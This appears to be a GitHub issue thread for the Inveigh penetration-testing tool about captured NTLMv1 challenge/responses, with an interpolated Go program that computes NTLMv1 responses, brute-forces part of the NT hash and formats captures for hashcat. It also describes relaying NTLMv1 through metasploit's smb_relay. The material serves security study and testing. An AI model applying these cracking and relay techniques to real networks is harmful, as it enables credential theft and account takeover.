Kevin-Robertson / Inveigh

.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers
BSD 3-Clause "New" or "Revised" License

NTLMv1 challenge/response #5

Closed Arno0x closed 8 years ago

Arno0x commented 8 years ago

Hello,

So far I can capture NTLMv1 challenge/response from HTTP authentication.

What can be done with this challenge/response apart from brute-forcing the raw password from it? It seems it can't be used with Invoke-InveighRelay as it only supports NTLMv2 (but it is still able to capture NTLMv1 challenge/response).

Thx, Arno

Kevin-Robertson commented 8 years ago

Yeah, for NTLMv1, Inveigh won't currently go any further than grabbing the challenge/response for cracking. Of course, you will be able to perform many more attempts per second while cracking NTLMv1 vs cracking NTLMv2. So, there is still an advantage on that front.

The relay function is due for a full overhaul. I hope to still add in NTLMv1.

Also, depending on your attack/pivot scenario, you may be able to just use the Inveigh spoofer to send traffic to another SMB relay tool that can handle NTLMv1.
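
The cracking advantage mentioned above comes from how the NTLMv1 response is built. The Go program below is an added example, not code from this issue thread or from Inveigh: it computes the 24-byte NTLMv1 NT response for a captured server challenge, formats it as the `user::domain:LM:NT:challenge` line that hashcat mode 5500 and John's `netntlm` format consume, and then shows the structural weakness that makes NTLMv1 cheap to attack. The NT hash and challenge are the worked NTLMv1 vector from MS-NLMP section 4.2.2 (password `Password`, challenge `0123456789abcdef`); the user and domain names are only labels, and the LM response is passed as a copy of the NT response, which is what a client sends when LM responses are disabled.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
)

// Constructed inputs: NTOWFv1("Password") and the 8-byte server challenge
// from the MS-NLMP 4.2.2 worked example.
var (
	ntHashHex       = "a4f49c406510bdcab6824ee7c30fd852"
	serverChallenge = []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef}
)

// expandDESKey turns 7 key bytes into the 8-byte form crypto/des expects:
// the 56 key bits are spread over 8 bytes, seven bits each, with bit 0 of
// every byte left as the parity bit that DES ignores.
func expandDESKey(k7 []byte) []byte {
	k8 := make([]byte, 8)
	k8[0] = k7[0]
	for i := 1; i < 7; i++ {
		k8[i] = (k7[i-1] << (8 - i)) | (k7[i] >> i)
	}
	k8[7] = k7[6] << 1
	for i := range k8 {
		k8[i] &= 0xfe // clear the parity position
	}
	return k8
}

// desEncryptBlock is one DES-ECB block encryption under a 7-byte key.
func desEncryptBlock(k7, block []byte) []byte {
	c, err := des.NewCipher(expandDESKey(k7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// DESL is the NTLMv1 response primitive (MS-NLMP section 6): pad the
// 16-byte hash with five zero bytes, split the 21 bytes into three 7-byte
// DES keys and encrypt the challenge under each one. Each 8-byte output
// block depends on only one 56-bit key, and the third key contains just
// two bytes of hash material.
func DESL(hash16, challenge []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, hash16)
	var resp []byte
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncryptBlock(padded[7*i:7*i+7], challenge)...)
	}
	return resp
}

// NTLMv1Response is the 24-byte NT response without extended session
// security, i.e. what a plain NTLMv1 client returns for a server challenge.
func NTLMv1Response(ntHash, challenge []byte) []byte {
	return DESL(ntHash, challenge)
}

// RecoverHashTail brute-forces the third DES key from a captured
// challenge/response pair. Only hash bytes 14 and 15 are unknown, so at most
// 65536 DES operations recover them, without guessing any password.
func RecoverHashTail(ntResp, challenge []byte) (tail [2]byte, ok bool) {
	target := ntResp[16:24]
	k7 := make([]byte, 7) // bytes 2..6 are the zero padding
	for i := 0; i < 0x10000; i++ {
		k7[0], k7[1] = byte(i>>8), byte(i)
		if bytes.Equal(desEncryptBlock(k7, challenge), target) {
			return [2]byte{k7[0], k7[1]}, true
		}
	}
	return tail, false
}

// NetNTLMv1Line formats a capture as user::domain:LM:NT:challenge, the
// layout read by hashcat -m 5500 and John's netntlm format.
func NetNTLMv1Line(user, domain string, lmResp, ntResp, challenge []byte) string {
	return fmt.Sprintf("%s::%s:%x:%x:%x", user, domain, lmResp, ntResp, challenge)
}

func main() {
	ntHash, _ := hex.DecodeString(ntHashHex)
	resp := NTLMv1Response(ntHash, serverChallenge)
	fmt.Printf("NTLMv1 response: %x\n", resp)
	tail, ok := RecoverHashTail(resp, serverChallenge)
	fmt.Printf("NT hash bytes 14-15 recovered: %x (found=%v)\n", tail[:], ok)
	fmt.Println(NetNTLMv1Line("User", "Domain", resp, resp, serverChallenge))
}
```

The last function is the point: a cracker working on NTLMv1 checks one MD4 plus three cheap DES operations per candidate and can attack the three response blocks independently, whereas NTLMv2 forces an HMAC-MD5 chain per candidate and gives no such split. The remaining two keys are each an ordinary 56-bit DES key search, which is why an NTLMv1 response to a known challenge can yield the NT hash itself and not merely a password guess.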

Arno0x commented 8 years ago

Thanks for your answer.

I can confirm using NTLMv1 by directing the traffic to another SMB relay (metasploit smb_relay) works just fine.